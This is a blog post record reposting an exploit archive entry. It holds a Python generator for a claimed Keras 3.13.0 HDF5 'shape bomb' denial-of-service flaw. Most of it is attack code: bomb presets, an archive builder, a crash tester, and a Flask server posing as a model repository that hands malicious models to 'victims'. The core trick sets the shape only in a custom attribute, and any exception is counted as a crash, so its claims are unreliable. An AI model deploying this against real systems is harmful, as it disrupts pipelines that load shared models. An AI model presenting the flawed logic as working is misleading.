{"id":48981,"date":"2026-04-23T13:51:21","date_gmt":"2026-04-23T13:51:21","guid":{"rendered":"http:\/\/localhost\/?p=48981"},"modified":"2026-04-23T13:51:21","modified_gmt":"2026-04-23T13:51:21","slug":"keras-3130-hdf5-shape-bomb-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=48981","title":{"rendered":"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685"},"content":{"rendered":"

{“lastseen”:”2026-04-23T17:44:01″,”description”:”This script is a security research tool demonstrating a denial of service vulnerability in Keras model loading through malicious HDF5 shape bombs. It generates .keras model archives containing artificially declared extremely large tensor shapes…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:219685″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0897″],”sourceData”:”==================================================================================================================================\\n | # Title : Keras 3.13.0 HDF5 Shape Bomb Denial-of-Service Exploit Generator |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/pypi.org\/project\/keras\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This script is a security research tool demonstrating a Denial-of-Service (DoS) vulnerability in Keras model loading through malicious HDF5 \u201cshape bombs.\u201d \\n It generates .keras model archives containing artificially declared extremely large tensor shapes designed to force excessive memory allocation during deserialization.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import os\\n import sys\\n import json\\n import h5py\\n import zipfile\\n import struct\\n import argparse\\n import logging\\n import numpy as np\\n from pathlib import Path\\n from typing import List, Dict, Optional, Tuple\\n from datetime import datetime\\n \\n logging.basicConfig(\\n level=logging.INFO,\\n format=’%(asctime)s – %(levelname)s – %(message)s’\\n )\\n logger = logging.getLogger(__name__)\\n \\n MAX_RANK_BEFORE_FIX = 64\\n MAX_BYTES_BEFORE_FIX = float(‘inf’) \\n EVIL_SHAPES = {\\n \\”petabyte_bomb\\”: (1000000, 1000000, 1000000), \\n \\”terabyte_bomb\\”: (100000, 100000, 10000), \\n \\”gigabyte_bomb\\”: (50000, 50000, 400), \\n \\”rank_bomb\\”: tuple([1000] * 100), \\n \\”overflow_bomb\\”: (2**31, 2**31, 2**31), \\n \\”null_bomb\\”: (0, 2**31, 2**31), \\n \\”negative_bomb\\”: (-1, 1000000, 1000000), \\n \\”fractional_bomb\\”: (1000000, 1000000, 1000000, 1000000),\\n }\\n \\n class HDF5ShapeBomb:\\n \\”\\”\\”Generate malicious HDF5 files with shape bombs\\”\\”\\”\\n \\n def __init__(self, output_file: str = \\”malicious_model.keras\\”):\\n self.output_file = output_file\\n self.temp_dir = Path(\\”temp_hdf5_bomb\\”)\\n self.temp_dir.mkdir(exist_ok=True)\\n \\n def _create_shape_bomb_hdf5(self, shape: Tuple[int, …], dtype: str = \\”float32\\”, \\n dataset_name: str = \\”layers\/dense\/vars\/0\\”) -\\u003e str:\\n \\”\\”\\”\\n Create HDF5 file with malicious shape declaration\\n \\n Args:\\n shape: Declared tensor shape (actual data is minimal)\\n dtype: Data type (affects memory calculation)\\n dataset_name: Name of the dataset\\n \\n Returns:\\n Path to created HDF5 file\\n \\”\\”\\”\\n h5_path = self.temp_dir \/ \\”model.weights.h5\\”\\n \\n with h5py.File(h5_path, \\”w\\”, libver=\\”latest\\”) as f:\\n \\n groups = dataset_name.split(‘\/’)\\n current = f\\n for group in groups[:-1]:\\n if group not in current:\\n current = current.create_group(group)\\n current = current[group]\\n dataset = current.create_dataset(\\n groups[-1],\\n shape=(0,), \\n maxshape=(None,),\\n dtype=dtype,\\n data=np.array([], dtype=dtype)\\n )\\n \\n if hasattr(dataset, \\”attrs\\”):\\n dataset.attrs[\\”DECLARED_SHAPE\\”] = shape\\n dataset.attrs[\\”SHAPE_BOMB\\”] = True\\n dataset.attrs[\\”TARGET_MEMORY_BYTES\\”] = self._calculate_memory(shape, dtype)\\n \\n logger.info(f\\”[+] Created HDF5 bomb at {h5_path}\\”)\\n logger.info(f\\” Declared shape: {shape}\\”)\\n logger.info(f\\” Memory required: {self._format_bytes(self._calculate_memory(shape, dtype))}\\”)\\n \\n return str(h5_path)\\n \\n def _calculate_memory(self, shape: Tuple[int, …], dtype: str) -\\u003e int:\\n \\”\\”\\”Calculate memory required for shape\\”\\”\\”\\n try:\\n import math\\n total_elements = math.prod(shape)\\n except OverflowError:\\n total_elements = float(‘inf’)\\n \\n dtype_size = np.dtype(dtype).itemsize\\n return total_elements * dtype_size\\n \\n def _format_bytes(self, bytes_count: int) -\\u003e str:\\n \\”\\”\\”Format bytes to human readable\\”\\”\\”\\n if bytes_count \\u003e= 1024**4:\\n return f\\”{bytes_count \/ 1024**4:.2f} PB\\”\\n elif bytes_count \\u003e= 1024**3:\\n return f\\”{bytes_count \/ 1024**3:.2f} TB\\”\\n elif bytes_count \\u003e= 1024**2:\\n return f\\”{bytes_count \/ 1024**2:.2f} GB\\”\\n elif bytes_count \\u003e= 1024:\\n return f\\”{bytes_count \/ 1024:.2f} MB\\”\\n else:\\n return f\\”{bytes_count} B\\”\\n \\n def _create_config_json(self, model_config: Dict = None) -\\u003e str:\\n \\”\\”\\”Create Keras config.json\\”\\”\\”\\n if model_config is None:\\n model_config = {\\n \\”class_name\\”: \\”Sequential\\”,\\n \\”config\\”: {\\n \\”name\\”: \\”sequential\\”,\\n \\”trainable\\”: True,\\n \\”layers\\”: [\\n {\\n \\”class_name\\”: \\”Dense\\”,\\n \\”config\\”: {\\n \\”name\\”: \\”dense\\”,\\n \\”trainable\\”: True,\\n \\”dtype\\”: \\”float32\\”,\\n \\”units\\”: 10,\\n \\”activation\\”: \\”relu\\”\\n }\\n }\\n ]\\n },\\n \\”keras_version\\”: \\”3.0.0\\”,\\n \\”backend\\”: \\”tensorflow\\”\\n }\\n \\n config_path = self.temp_dir \/ \\”config.json\\”\\n with open(config_path, \\”w\\”) as f:\\n json.dump(model_config, f, indent=2)\\n \\n return str(config_path)\\n \\n def _create_metadata_json(self) -\\u003e str:\\n \\”\\”\\”Create Keras metadata.json\\”\\”\\”\\n metadata = {\\n \\”keras_version\\”: \\”3.0.0\\”,\\n \\”backend\\”: \\”tensorflow\\”,\\n \\”model_config\\”: {\\n \\”class_name\\”: \\”Sequential\\”,\\n \\”config\\”: {\\”name\\”: \\”sequential\\”, \\”trainable\\”: True}\\n }\\n }\\n \\n metadata_path = self.temp_dir \/ \\”metadata.json\\”\\n with open(metadata_path, \\”w\\”) as f:\\n json.dump(metadata, f, indent=2)\\n \\n return str(metadata_path)\\n \\n def build_keras_archive(self, shape: Tuple[int, …], \\n dtype: str = \\”float32\\”,\\n dataset_name: str = \\”layers\/dense\/vars\/0\\”) -\\u003e str:\\n \\”\\”\\”\\n Build complete .keras archive with shape bomb\\n \\n Args:\\n shape: Malicious shape declaration\\n dtype: Data type\\n dataset_name: Dataset name in HDF5\\n \\n Returns:\\n Path to generated .keras file\\n \\”\\”\\”\\n logger.info(f\\”[*] Building Keras archive with shape bomb: {shape}\\”)\\n \\n h5_path = self._create_shape_bomb_hdf5(shape, dtype, dataset_name)\\n \\n config_path = self._create_config_json()\\n metadata_path = self._create_metadata_json()\\n \\n with zipfile.ZipFile(self.output_file, \\”w\\”, zipfile.ZIP_DEFLATED) as zf:\\n zf.write(h5_path, \\”model.weights.h5\\”)\\n zf.write(config_path, \\”config.json\\”)\\n zf.write(metadata_path, \\”metadata.json\\”)\\n \\n for f in [h5_path, config_path, metadata_path]:\\n if os.path.exists(f):\\n os.unlink(f)\\n \\n self.temp_dir.rmdir()\\n \\n file_size = os.path.getsize(self.output_file)\\n logger.info(f\\”[+] Keras archive created: {self.output_file}\\”)\\n logger.info(f\\” File size: {self._format_bytes(file_size)}\\”)\\n logger.info(f\\” Memory impact: {self._format_bytes(self._calculate_memory(shape, dtype))}\\”)\\n logger.info(f\\” Amplification ratio: {self._calculate_memory(shape, dtype) \/ file_size:.0f}x\\”)\\n \\n return self.output_file\\n \\n class KerasDoSAttack:\\n \\”\\”\\”Execute DoS attack against vulnerable Keras installations\\”\\”\\”\\n \\n def __init__(self, target_model_path: str = None):\\n self.target_model_path = target_model_path\\n \\n def test_local_vulnerability(self, model_path: str) -\\u003e bool:\\n \\”\\”\\”\\n Test if local Keras installation is vulnerable\\n \\n Args:\\n model_path: Path to malicious model\\n \\n Returns:\\n True if crash occurred (vulnerable), False otherwise\\n \\”\\”\\”\\n try:\\n import keras\\n logger.info(\\”[*] Attempting to load malicious model…\\”)\\n \\n model = keras.saving.load_model(model_path)\\n \\n logger.warning(\\”[!] Model loaded successfully – Keras may be patched!\\”)\\n return False\\n \\n except MemoryError as e:\\n logger.error(f\\”[!!!] MemoryError: {e}\\”)\\n return True\\n except Exception as e:\\n logger.error(f\\”[!!!] Crash: {e}\\”)\\n return True\\n \\n def create_remote_exploit_script(self, output_file: str = \\”exploit_server.py\\”) -\\u003e str:\\n \\”\\”\\”\\n Create a malicious model server that serves shape bombs\\n \\n Args:\\n output_file: Output script name\\n \\n Returns:\\n Path to created script\\n \\”\\”\\”\\n script_content = ”’#!\/usr\/bin\/env python3\\n \\”\\”\\”Malicious model server for CVE-2026-0897\\”\\”\\”\\n \\n from flask import Flask, send_file, request\\n import os\\n import zipfile\\n import h5py\\n import json\\n \\n app = Flask(__name__)\\n \\n EVIL_SHAPE = (1000000, 1000000, 1000000) # 4 PB bomb\\n \\n def create_malicious_model():\\n \\”\\”\\”Generate shape bomb on demand\\”\\”\\”\\n import tempfile\\n import numpy as np\\n \\n temp_dir = tempfile.mkdtemp()\\n model_path = os.path.join(temp_dir, \\”malicious.keras\\”)\\n \\n with h5py.File(os.path.join(temp_dir, \\”model.weights.h5\\”), \\”w\\”) as f:\\n dataset = f.create_dataset(\\n \\”layers\/dense\/vars\/0\\”,\\n shape=(0,),\\n maxshape=(None,),\\n dtype=\\”float32\\”,\\n data=np.array([], dtype=\\”float32\\”)\\n )\\n dataset.attrs[\\”DECLARED_SHAPE\\”] = EVIL_SHAPE\\n config = {\\n \\”class_name\\”: \\”Sequential\\”,\\n \\”config\\”: {\\”name\\”: \\”sequential\\”, \\”trainable\\”: True},\\n \\”keras_version\\”: \\”3.0.0\\”\\n }\\n \\n with zipfile.ZipFile(model_path, \\”w\\”) as zf:\\n zf.write(os.path.join(temp_dir, \\”model.weights.h5\\”), \\”model.weights.h5\\”)\\n zf.writestr(\\”config.json\\”, json.dumps(config))\\n \\n return model_path\\n \\n @app.route(‘\/model.keras’)\\n def serve_malicious_model():\\n \\”\\”\\”Serve the shape bomb model\\”\\”\\”\\n model_path = create_malicious_model()\\n return send_file(model_path, as_attachment=True)\\n \\n @app.route(‘\/’)\\n def index():\\n return ”’\\n \\u003ch1\\u003eModel Repository\\u003c\/h1\\u003e\\n \\u003cp\\u003eDownload models for your ML pipeline:\\u003c\/p\\u003e\\n \\u003ca href=\\”\/model.keras\\”\\u003eDownload model.keras (latest)\\u003c\/a\\u003e\\n ”’\\n \\n if __name__ == ‘__main__’:\\n app.run(host=’0.0.0.0′, port=8080)\\n ”’\\n \\n with open(output_file, ‘w’) as f:\\n f.write(script_content)\\n \\n os.chmod(output_file, 0o755)\\n logger.info(f\\”[+] Remote exploit server script created: {output_file}\\”)\\n return output_file\\n class ExploitTester:\\n \\”\\”\\”Test and validate the exploit\\”\\”\\”\\n \\n @staticmethod\\n def test_memory_impact(shape: Tuple[int, …], dtype: str = \\”float32\\”) -\\u003e Dict:\\n \\”\\”\\”Calculate theoretical memory impact\\”\\”\\”\\n import math\\n \\n try:\\n elements = math.prod(shape)\\n bytes_needed = elements * np.dtype(dtype).itemsize\\n \\n return {\\n \\”shape\\”: shape,\\n \\”elements\\”: elements,\\n \\”bytes\\”: bytes_needed,\\n \\”bytes_formatted\\”: format_bytes(bytes_needed),\\n \\”dtype\\”: dtype,\\n \\”overflow\\”: False\\n }\\n except OverflowError:\\n return {\\n \\”shape\\”: shape,\\n \\”elements\\”: float(‘inf’),\\n \\”bytes\\”: float(‘inf’),\\n \\”bytes_formatted\\”: \\”INFINITE\\”,\\n \\”dtype\\”: dtype,\\n \\”overflow\\”: True\\n }\\n \\n @staticmethod\\n def scan_keras_version() -\\u003e Dict:\\n \\”\\”\\”Check Keras version and vulnerability status\\”\\”\\”\\n try:\\n import keras\\n version = keras.__version__\\n \\n # Parse version\\n parts = [int(x) for x in version.split(‘.’)[:3]]\\n is_vulnerable = False\\n \\n if parts[0] == 3:\\n if 0 \\u003c= parts[1] \\u003c= 13:\\n is_vulnerable = True\\n \\n return {\\n \\”version\\”: version,\\n \\”is_vulnerable\\”: is_vulnerable,\\n \\”has_fix\\”: not is_vulnerable\\n }\\n except ImportError:\\n return {\\n \\”version\\”: None,\\n \\”is_vulnerable\\”: False,\\n \\”has_fix\\”: False,\\n \\”error\\”: \\”Keras not installed\\”\\n }\\n \\n def format_bytes(bytes_count):\\n \\”\\”\\”Format bytes to human readable\\”\\”\\”\\n if bytes_count \\u003e= 1024**4:\\n return f\\”{bytes_count \/ 1024**4:.2f} PB\\”\\n elif bytes_count \\u003e= 1024**3:\\n return f\\”{bytes_count \/ 1024**3:.2f} TB\\”\\n elif bytes_count \\u003e= 1024**2:\\n return f\\”{bytes_count \/ 1024**2:.2f} GB\\”\\n elif bytes_count \\u003e= 1024:\\n return f\\”{bytes_count \/ 1024:.2f} MB\\”\\n else:\\n return f\\”{bytes_count} B\\”\\n def main():\\n parser = argparse.ArgumentParser(\\n description=’CVE-2026-0897 – Google Keras DoS Exploit (HDF5 Shape Bomb)’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n python exploit.py –shape petabyte_bomb –output malicious.keras\\n python exploit.py –shape 1000000,1000000,1000000 –output bomb.keras\\n python exploit.py –test –model malicious.keras\\n python exploit.py –all –output-dir .\/bombs\/\\n python exploit.py –server –port 8080\\n python exploit.py –check-version\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(‘–shape’, help=’Shape bomb type or custom dimensions (e.g., 1000,1000,1000)’)\\n parser.add_argument(‘–output’, ‘-o’, default=’malicious_model.keras’, help=’Output .keras file’)\\n parser.add_argument(‘–output-dir’, help=’Directory for multiple bombs’)\\n parser.add_argument(‘–all’, action=’store_true’, help=’Generate all bomb types’)\\n parser.add_argument(‘–test’, action=’store_true’, help=’Test vulnerability with generated model’)\\n parser.add_argument(‘–model’, help=’Model file to test’)\\n parser.add_argument(‘–server’, action=’store_true’, help=’Create remote exploit server script’)\\n parser.add_argument(‘–port’, type=int, default=8080, help=’Port for exploit server’)\\n parser.add_argument(‘–check-version’, action=’store_true’, help=’Check Keras version vulnerability’)\\n parser.add_argument(‘–dtype’, default=’float32′, help=’Data type (float32, float64, int8, etc.)’)\\n parser.add_argument(‘–verbose’, ‘-v’, action=’store_true’, help=’Verbose output’)\\n \\n args = parser.parse_args()\\n \\n print(\\”\\”\\”\\n ========================================\\n CVE-2026-0897 – Keras DoS Exploit\\n HDF5 Shape Bomb – Resource Exhaustion\\n ========================================\\n \\”\\”\\”)\\n \\n if args.check_version:\\n info = ExploitTester.scan_keras_version()\\n print(f\\”[*] Keras version: {info[‘version’] or ‘Not installed’}\\”)\\n if info.get(‘is_vulnerable’):\\n print(\\”[!!!] VULNERABLE version detected! (3.0.0 – 3.13.0)\\”)\\n elif info.get(‘has_fix’):\\n print(\\”[+] Keras appears patched (version \\u003e 3.13.0)\\”)\\n else:\\n print(\\”[?] Unable to determine vulnerability status\\”)\\n return\\n \\n if args.server:\\n attacker = KerasDoSAttack()\\n script_path = attacker.create_remote_exploit_script(f\\”exploit_server_{args.port}.py\\”)\\n print(f\\”\\\\n[+] Exploit server script created: {script_path}\\”)\\n print(f\\”[*] Run: python3 {script_path}\\”)\\n print(f\\”[*] Victims will download malicious models from http:\/\/your-server:8080\/model.keras\\”)\\n return\\n \\n if args.all:\\n if not args.output_dir:\\n args.output_dir = \\”shape_bombs\\”\\n \\n os.makedirs(args.output_dir, exist_ok=True)\\n \\n for bomb_name, bomb_shape in EVIL_SHAPES.items():\\n output_file = os.path.join(args.output_dir, f\\”{bomb_name}.keras\\”)\\n generator = HDF5ShapeBomb(output_file)\\n \\n print(f\\”\\\\n[*] Generating {bomb_name}: {bomb_shape}\\”)\\n generator.build_keras_archive(bomb_shape, args.dtype)\\n \\n print(f\\”\\\\n[+] All bombs generated in {args.output_dir}\/\\”)\\n return\\n if args.shape:\\n \\n if args.shape in EVIL_SHAPES:\\n shape = EVIL_SHAPES[args.shape]\\n else:\\n try:\\n shape = tuple(int(x.strip()) for x in args.shape.split(‘,’))\\n except:\\n print(f\\”[!] Invalid shape format: {args.shape}\\”)\\n return\\n \\n impact = ExploitTester.test_memory_impact(shape, args.dtype)\\n print(f\\”[*] Shape bomb configuration:\\”)\\n print(f\\” Dimensions: {impact[‘shape’]}\\”)\\n print(f\\” Total elements: {impact[‘elements’]}\\”)\\n print(f\\” Memory required: {impact[‘bytes_formatted’]}\\”)\\n print(f\\” Data type: {impact[‘dtype’]}\\”)\\n \\n if impact.get(‘overflow’):\\n print(\\”[!!!] INTEGER OVERFLOW DETECTED – May bypass some checks!\\”)\\n \\n generator = HDF5ShapeBomb(args.output)\\n generator.build_keras_archive(shape, args.dtype)\\n \\n if args.test:\\n print(\\”\\\\n[*] Testing vulnerability…\\”)\\n attacker = KerasDoSAttack()\\n is_vulnerable = attacker.test_local_vulnerability(args.output)\\n \\n if is_vulnerable:\\n print(\\”\\\\n[!!!] Keras IS VULNERABLE! Process crashed.\\”)\\n else:\\n print(\\”\\\\n[+] Keras appears patched or model was safe.\\”)\\n \\n else:\\n parser.print_help()\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219685″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219685\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-23T17:44:01″,”description”:”This script is a security research tool demonstrating a denial of service vulnerability in Keras model loading through malicious HDF5 shape bombs. It generates .keras…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-48981","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=48981\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-23T17:44:01″,”description”:”This script is a security research tool demonstrating a denial of service vulnerability in Keras model loading through malicious HDF5 shape bombs. It generates .keras...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=48981\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-23T13:51:21+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685\",\"datePublished\":\"2026-04-23T13:51:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981\"},\"wordCount\":2583,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48981#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981\",\"name\":\"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-23T13:51:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48981\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48981#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=48981","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685 - zero redgem","og_description":"{“lastseen”:”2026-04-23T17:44:01″,”description”:”This script is a security research tool demonstrating a denial of service vulnerability in Keras model loading through malicious HDF5 shape bombs. It generates .keras...","og_url":"https:\/\/zero.redgem.net\/?p=48981","og_site_name":"zero redgem","article_published_time":"2026-04-23T13:51:21+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=48981#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=48981"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685","datePublished":"2026-04-23T13:51:21+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=48981"},"wordCount":2583,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=48981#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=48981","url":"https:\/\/zero.redgem.net\/?p=48981","name":"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-23T13:51:21+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=48981#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=48981"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=48981#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 